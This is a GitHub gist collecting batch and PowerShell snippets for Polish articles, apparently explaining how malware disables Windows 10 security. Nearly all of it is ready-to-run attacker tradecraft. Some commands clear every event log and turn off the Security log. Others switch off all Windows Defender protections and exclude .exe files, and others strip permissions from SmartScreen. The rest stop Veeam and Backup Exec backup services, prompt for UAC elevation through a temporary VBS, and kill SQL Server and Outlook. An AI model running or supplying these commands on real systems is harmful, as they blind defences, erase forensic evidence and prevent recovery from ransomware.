Last active
June 18, 2021 17:23
-
-
Save tomaszklim/2ec69a4406700d8aa688b66bfbc94ebe to your computer and use it in GitHub Desktop.
Source code for articles on Payload.pl
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| REM Code from https://payload.pl/jak-prosto-wirusy-rozbrajaja-zabezpieczenia-windows-10/ | |
| for /f “delims=” %%I in (‘wevtutil el’) do (wevtutil cl “%%I”) | |
| wevtutil sl Security /e:false |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| REM Code from https://payload.pl/windows-defender/ | |
| powershell.exe -command "Add-MpPreference -ExclusionExtension ".exe"" | |
| powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled" | |
| powershell.exe -command "Set-MpPreference -PUAProtection disable" | |
| powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true" | |
| powershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true" | |
| powershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true" | |
| powershell.exe -command "Set-MpPreference -DisableIOAVProtection $true" | |
| powershell.exe -command "Set-MpPreference -DisablePrivacyMode $true" | |
| powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true" | |
| powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true" | |
| powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true" | |
| powershell.exe -command "Set-MpPreference -DisableScriptScanning $true" | |
| powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2" | |
| powershell.exe -command "Set-MpPreference -MAPSReporting 0" | |
| powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force" | |
| powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6" | |
| powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6" | |
| powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6" | |
| powershell.exe -command "Set-MpPreference -ScanScheduleDay 8" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| REM Code from https://payload.pl/smartscreen/ | |
| takeown /f "%systemroot%\System32\smartscreen.exe" /a | |
| icacls "%systemroot%\System32\smartscreen.exe" /reset | |
| taskkill /im smartscreen.exe /f | |
| icacls "%systemroot%\System32\smartscreen.exe" /inheritance:r /remove *S-1-5-32-544 *S-1-5-11 *S-1-5-32-545 *S-1-5-18 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| REM Code from https://payload.pl/jak-popsuc-backup-windows/ | |
| net stop VeeamBackupSvc | |
| net stop VeeamBrokerSvc | |
| net stop VeeamCatalogSvc | |
| net stop VeeamCloudSvc | |
| net stop VeeamDeploymentService | |
| net stop VeeamDeploySvc | |
| net stop VeeamEnterpriseManagerSvc | |
| net stop VeeamHvIntegrationSvc | |
| net stop VeeamMountSvc | |
| net stop VeeamNFSSvc | |
| net stop VeeamRESTSvc | |
| net stop VeeamTransportSvc |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| REM Code from https://payload.pl/jak-popsuc-backup-windows/ | |
| net stop BackupExecAgentAccelerator | |
| net stop BackupExecAgentBrowser | |
| net stop BackupExecDeviceMediaService | |
| net stop BackupExecJobEngine | |
| net stop BackupExecManagementService | |
| net stop BackupExecRPCService | |
| net stop BackupExecVSSProvider |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| REM Code from https://payload.pl/wirusy-i-uac/ | |
| >nul 2>&1 "%systemroot%\System32\cacls.exe" "%systemroot%\System32\config\system" | |
| REM --> If error flag set, we do not have admin. | |
| if '%errorlevel%' NEQ '0' ( | |
| echo Requesting administrative privileges... | |
| goto UACPrompt | |
| ) else ( goto gotAdmin ) | |
| :UACPrompt | |
| echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs" | |
| set params = %*:"=" | |
| echo UAC.ShellExecute "cmd.exe", "/c %~s0 %params%", "", "runas", 1 >> "%temp%\getadmin.vbs" | |
| "%temp%\getadmin.vbs" | |
| del "%temp%\getadmin.vbs" | |
| exit /B | |
| :gotAdmin | |
| pushd "%CD%" | |
| CD /D "%~dp0" | |
| echo "Now have elevated permissions." | |
| whoami | |
| pause |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| REM Code from https://payload.pl/jak-prosto-wirusy-rozbrajaja-zabezpieczenia-windows-10/ | |
| taskkill /im sqlservr.exe /f | |
| taskkill /im outlook.exe /f |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment